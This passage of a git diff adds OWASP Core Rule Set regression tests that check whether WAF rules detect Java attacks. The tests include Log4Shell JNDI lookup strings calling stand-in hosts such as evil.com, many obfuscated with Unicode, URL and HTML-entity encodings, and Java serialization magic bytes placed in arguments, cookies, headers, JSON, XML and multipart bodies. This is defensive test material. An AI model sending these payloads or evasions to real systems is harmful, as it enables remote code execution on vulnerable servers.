log_contains: id "944152" + - test_title: 944152-11 + desc: Log4J exploit on JSON with Unicode escape evasion, lowercase + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-12 + desc: Log4J exploit on JSON with named HTML entity evasion, lower case + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-13 + desc: Log4J exploit on JSON with named HTML entity evasion, upper case + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-14 + desc: Log4J exploit on JSON with numeric HTML entity evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-15 + desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": 
"%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944152" + - test_title: 944152-16 + desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944152" + - test_title: 944152-17 + desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944152" + - test_title: 944152-18 + desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944152" + - test_title: 944152-19 + desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944152" + - test_title: 944152-20 + desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion + stages: + - stage: + 
input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-21 + desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-22 + desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-23 + desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: / + output: + log_contains: id "944152" + - test_title: 944152-24 + desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + output: + 
log_contains: id "944152" + - test_title: 944152-25 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} + output: + log_contains: id "944152" + - test_title: 944152-26 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}' + output: + log_contains: id "944152" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml new file mode 100644 index 00000000..288c536e --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml 
@@ -0,0 +1,17 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944200.yaml" + description: "Description" +tests: + - test_title: 944200-1 + desc: Argument test includes java serialization magic bytes, base64 encoded request + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + encoded_request: "UE9TVCAvIEhUVFAvMS4wDQpIb3N0OiBsb2NhbGhvc3QNClVzZXItQWdlbnQ6IE9XQVNQIE1vZFNlY3VyaXR5IENvcmUgUnVsZSBTZXQNCkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCxpbWFnZS9wbmcsKi8qO3E9MC41DQpBY2NlcHQtQ2hhcnNldDogSVNPLTg4NTktMSx1dGYtODtxPTAuNywqO3E9MC43DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZQ0KQWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiA5DQoNCnRlc3Q9rO0ABQ0KDQo=" + output: + log_contains: "id \"944200\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml new file mode 100644 index 00000000..136522c0 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml 
@@ -0,0 +1,1057 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944210.yaml" + description: "Positive tests for rule 944210" +tests: + - test_title: 944210-1 + desc: "Argument test includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-2 + desc: "Argument name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "rO0ABQ=test" + output: + log_contains: "id \"944210\"" + - test_title: 944210-3 + desc: "Cookie test includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=rO0ABQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-4 + desc: "Cookie name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: rO0ABQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-5 + desc: "Request header test includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: rO0ABQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-6 + desc: "XML element includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-7 + desc: "XML attribute name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - 
test_title: 944210-8 + desc: "XML attribute value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-9 + desc: "XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-10 + desc: "Nested XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-11 + desc: "Content-Type text/plain includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-12 + desc: "Content-Type application/json arg value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"rO0ABQ\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-13 + desc: "Content-Type application/json arg name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"rO0ABQ\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-14 + desc: "Content-Type multipart/form-data json arg name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"rO0ABQ": "test"} + 
-----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-15 + desc: "Content-Type multipart/form-data json arg value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-16 + desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + rO0ABQ + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-17 + desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + rO0ABQ + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-18 + desc: "Argument test includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-19 + desc: "Argument name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "KztAAU=test" + output: + log_contains: "id \"944210\"" + - test_title: 944210-20 + desc: "Cookie test includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=KztAAU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-21 + desc: "Cookie name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: KztAAU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-22 + desc: "Request header test includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: KztAAU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-23 + desc: "XML element includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-24 + desc: "XML attribute name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: 
+ Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-25 + desc: "XML attribute value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-26 + desc: "XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-27 + desc: "Nested XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 
944210-28 + desc: "Content-Type text/plain includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-29 + desc: "Content-Type application/json arg value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"KztAAU\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-30 + desc: "Content-Type application/json arg name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"KztAAU\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-31 + desc: "Content-Type multipart/form-data json arg name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-32 + desc: "Content-Type multipart/form-data json arg value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-33 + desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + KztAAU + -----------------------------thisissparta-- + output: + 
log_contains: "id \"944210\"" + - test_title: 944210-34 + desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + KztAAU + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-35 + desc: "Argument test includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-36 + desc: "Argument name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Cs7QAF=test" + output: + log_contains: "id \"944210\"" + - test_title: 944210-37 + desc: "Cookie test includes keyword Cs7QAF" + stages: + - 
